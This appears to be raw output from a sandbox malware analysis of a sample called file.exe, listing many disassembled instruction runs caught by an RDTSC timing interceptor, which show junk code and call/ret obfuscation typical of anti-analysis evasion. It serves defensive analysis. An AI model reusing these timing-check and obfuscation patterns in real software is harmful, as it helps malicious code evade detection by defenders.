Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6FA10F, second address: 581BA5, instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C475615Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a add dword ptr [esp], 00299001h 0x00000011 mov dword ptr [ebp+122D19ADh], ecx 0x00000017 push dword ptr [ebp+122D13FDh] 0x0000001d add dword ptr [ebp+122D1C3Fh], eax 0x00000023 call dword ptr [ebp+122D1E69h] 0x00000029 pushad 0x0000002a cld 0x0000002b xor eax, eax 0x0000002d jns 00007FD3C4756164h 0x00000033 mov edx, dword ptr [esp+28h] 0x00000037 mov dword ptr [ebp+122D26FCh], edx 0x0000003d mov dword ptr [ebp+122D3824h], eax 0x00000043 mov dword ptr [ebp+122D26FCh], ecx 0x00000049 mov esi, 0000003Ch 0x0000004e jmp 00007FD3C475615Eh 0x00000053 pushad 0x00000054 movsx ebx, ax 0x00000057 mov edi, ecx 0x00000059 popad 0x0000005a add esi, dword ptr [esp+24h] 0x0000005e add dword ptr [ebp+122D184Ah], eax 0x00000064 lodsw 0x00000066 clc 0x00000067 add eax, dword ptr [esp+24h] 0x0000006b mov dword ptr [ebp+122D26FCh], edi 0x00000071 mov ebx, dword ptr [esp+24h] 0x00000075 pushad 0x00000076 mov ecx, 5CBB14DCh 0x0000007b xor dword ptr [ebp+122D184Ah], ecx 0x00000081 popad 0x00000082 nop 0x00000083 pushad 0x00000084 jmp 00007FD3C4756161h 0x00000089 pushad 0x0000008a push eax 0x0000008b push edx 0x0000008c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6FA157, second address: 6FA1B6, instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C524B20Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c pushad 0x0000000d jl 00007FD3C524B20Ch 0x00000013 mov dword ptr [ebp+122D2527h], ebx 0x00000019 and ax, 4651h 0x0000001e popad 0x0000001f push 00000000h 0x00000021 call 00007FD3C524B209h 0x00000026 jbe 00007FD3C524B20Ah 0x0000002c push edx 0x0000002d push edx 0x0000002e pop edx 0x0000002f pop edx 0x00000030 push eax 0x00000031 push ecx 0x00000032 jnl 00007FD3C524B208h 0x00000038 pop ecx 0x00000039 mov eax, dword ptr [esp+04h] 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007FD3C524B20Fh 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6FA1B6, second address: 6FA1C6, instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C475615Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6FA1C6, second address: 6FA21E, instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C524B219h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jnc 00007FD3C524B21Ah 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FD3C524B217h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6FA21E, second address: 6FA22E, instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C475615Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 6FA348, second address: 6FA38E, instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007FD3C524B208h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 sub dword ptr [ebp+122D28F7h], edi 0x00000029 mov cx, ax 0x0000002c push 00000000h 0x0000002e mov ecx, dword ptr [ebp+122D1C3Fh] 0x00000034 push 675CB780h 0x00000039 push edi 0x0000003a push eax 0x0000003b push edx 0x0000003c jns 00007FD3C524B206h 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA436 second address: 6FA491 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C4756167h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007FD3C4756158h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov esi, edi 0x00000029 push 00000000h 0x0000002b pushad 0x0000002c mov dword ptr [ebp+122D1986h], eax 0x00000032 mov di, A626h 0x00000036 popad 0x00000037 push 89E31619h 0x0000003c push esi 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70B0F2 second address: 70B0F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70B0F6 second address: 70B0FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 718814 second address: 718819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7189F1 second address: 7189FB instructions: 0x00000000 rdtsc 0x00000002 je 00007FD3C4756156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 718FD3 second address: 718FD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 718FD9 second address: 718FED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007FD3C4756156h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007FD3C475615Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71941E second address: 71943E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FD3C524B218h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71943E second address: 719442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 719442 second address: 719464 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD3C524B206h 0x00000008 jmp 00007FD3C524B218h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 719464 second address: 71946E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FD3C4756156h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71946E second address: 719497 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD3C524B206h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FD3C524B214h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71960A second address: 719610 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 719610 second address: 719614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71977F second address: 719783 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 719783 second address: 71978B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 719900 second address: 719906 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 719906 second address: 71990C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 719C03 second address: 719C07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 719C07 second address: 719C0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 719C0D second address: 719C1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FD3C4756156h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 719C1D second address: 719C21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71A23A second address: 71A251 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD3C4756156h 0x00000008 jmp 00007FD3C475615Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71A251 second address: 71A25B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FD3C524B206h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71A25B second address: 71A25F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71A519 second address: 71A53E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 js 00007FD3C524B206h 0x0000000e jmp 00007FD3C524B212h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71A53E second address: 71A550 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C475615Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 71A550 second address: 71A55B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726185 second address: 72618E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72618E second address: 726192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726192 second address: 72619C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD3C4756156h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 725CF7 second address: 725D1B instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD3C524B21Fh 0x00000008 jmp 00007FD3C524B219h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72691D second address: 726921 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726921 second address: 72692B instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD3C524B206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72692B second address: 726956 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD3C4756168h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 je 00007FD3C4756156h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726956 second address: 72695B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72695B second address: 726971 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jne 00007FD3C4756156h 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726971 second address: 726995 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FD3C524B20Eh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jnc 00007FD3C524B206h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726995 second address: 726999 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 726999 second address: 72699F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7278D1 second address: 7278E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD3C4756160h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727EE4 second address: 727EE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727EE8 second address: 727F48 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 jmp 00007FD3C4756161h 0x0000000d nop 0x0000000e mov di, cx 0x00000011 push 00000000h 0x00000013 mov dword ptr [ebp+1244ACD4h], edi 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007FD3C4756158h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 0000001Ah 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 jmp 00007FD3C4756162h 0x0000003a xchg eax, ebx 0x0000003b pushad 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72AF72 second address: 72AFE9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD3C4C2635Bh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c jbe 00007FD3C4C2634Ch 0x00000012 pop ebx 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007FD3C4C26348h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 00000017h 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e mov dword ptr [ebp+122D1DC0h], eax 0x00000034 adc si, 3BD6h 0x00000039 push 00000000h 0x0000003b sub dword ptr [ebp+1244CEFFh], ebx 0x00000041 push 00000000h 0x00000043 mov dword ptr [ebp+122D1DC0h], edx 0x00000049 xchg eax, ebx 0x0000004a pushad 0x0000004b push eax 0x0000004c jl 00007FD3C4C26346h 0x00000052 pop eax 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 pop eax 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72B856 second address: 72B860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72B860 second address: 72B88D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD3C4C26358h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jg 00007FD3C4C26348h 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C3C2 second address: 72C3C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C67D second address: 72C681 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C681 second address: 72C6FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FD3C4DD8D68h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov dword ptr [ebp+1244CEE6h], edx 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edi 0x0000002f call 00007FD3C4DD8D68h 0x00000034 pop edi 0x00000035 mov dword ptr [esp+04h], edi 0x00000039 add dword ptr [esp+04h], 0000001Bh 0x00000041 inc edi 0x00000042 push edi 0x00000043 ret 0x00000044 pop edi 0x00000045 ret 0x00000046 xor edi, 5E2D850Eh 0x0000004c cld 0x0000004d push 00000000h 0x0000004f mov esi, 21D8021Fh 0x00000054 xchg eax, ebx 0x00000055 push eax 0x00000056 push edx 0x00000057 jne 00007FD3C4DD8D77h 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72C6FF second address: 72C71B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FD3C4C2634Ch 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007FD3C4C26346h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E8D4 second address: 72E8EC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FD3C4DD8D6Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E8EC second address: 72E923 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 call 00007FD3C4C26350h 0x0000000d sub di, F27Ah 0x00000012 pop esi 0x00000013 push 00000000h 0x00000015 mov edi, dword ptr [ebp+122D268Dh] 0x0000001b push 00000000h 0x0000001d mov esi, 7B760C1Dh 0x00000022 xchg eax, ebx 0x00000023 push edi 0x00000024 jp 00007FD3C4C2634Ch 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72E923 second address: 72E92E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72F174 second address: 72F178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 733A66 second address: 733AE7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FD3C4DD8D6Ch 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 jmp 00007FD3C4DD8D78h 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007FD3C4DD8D68h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 00000015h 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 jbe 00007FD3C4DD8D6Ch 0x00000039 or edi, dword ptr [ebp+122D268Dh] 0x0000003f xchg eax, esi 0x00000040 jno 00007FD3C4DD8D80h 0x00000046 push eax 0x00000047 push edx 0x00000048 push ecx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 735A6D second address: 735A97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3C4C2634Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FD3C4C2634Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007FD3C4C26346h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 735A97 second address: 735AE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov dword ptr [ebp+1244AC03h], edx 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007FD3C4DD8D68h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c mov dword ptr [ebp+12451400h], esi 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 jmp 00007FD3C4DD8D6Eh 0x0000003b pushad 0x0000003c popad 0x0000003d popad 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 734D0F second address: 734DBB instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD3C4C2634Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FD3C4C26348h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 mov ebx, 4502D0B1h 0x0000002c push dword ptr fs:[00000000h] 0x00000033 push 00000000h 0x00000035 push ebx 0x00000036 call 00007FD3C4C26348h 0x0000003b pop ebx 0x0000003c mov dword ptr [esp+04h], ebx 0x00000040 add dword ptr [esp+04h], 0000001Dh 0x00000048 inc ebx 0x00000049 push ebx 0x0000004a ret 0x0000004b pop ebx 0x0000004c ret 0x0000004d add bx, BD01h 0x00000052 cmc 0x00000053 mov dword ptr fs:[00000000h], esp 0x0000005a pushad 0x0000005b mov ecx, dword ptr [ebp+122D2400h] 0x00000061 mov dword ptr [ebp+1244AC33h], edi 0x00000067 popad 0x00000068 mov eax, dword ptr [ebp+122D1005h] 0x0000006e mov edi, dword ptr [ebp+122D251Bh] 0x00000074 push FFFFFFFFh 0x00000076 mov dword ptr [ebp+1245D950h], ecx 0x0000007c cmc 0x0000007d nop 0x0000007e jmp 00007FD3C4C26351h 0x00000083 push eax 0x00000084 pushad 0x00000085 push eax 0x00000086 push eax 0x00000087 push edx 0x00000088 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 735AE6 second address: 735AEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 735AEC second address: 735AF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 735AF0 second address: 735AF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 736A6E second address: 736AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007FD3C4C26348h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000014h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 pushad 0x00000026 jng 00007FD3C4C2634Ch 0x0000002c mov dword ptr [ebp+122DB640h], ecx 0x00000032 add dword ptr [ebp+122D1C7Eh], edi 0x00000038 popad 0x00000039 push 00000000h 0x0000003b add bl, 00000012h 0x0000003e mov dword ptr [ebp+1244C7FBh], edi 0x00000044 push 00000000h 0x00000046 xor bh, FFFFFFA1h 0x00000049 xchg eax, esi 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f popad 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 736AC0 second address: 736AC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 737AC2 second address: 737AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 736CFA second address: 736CFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
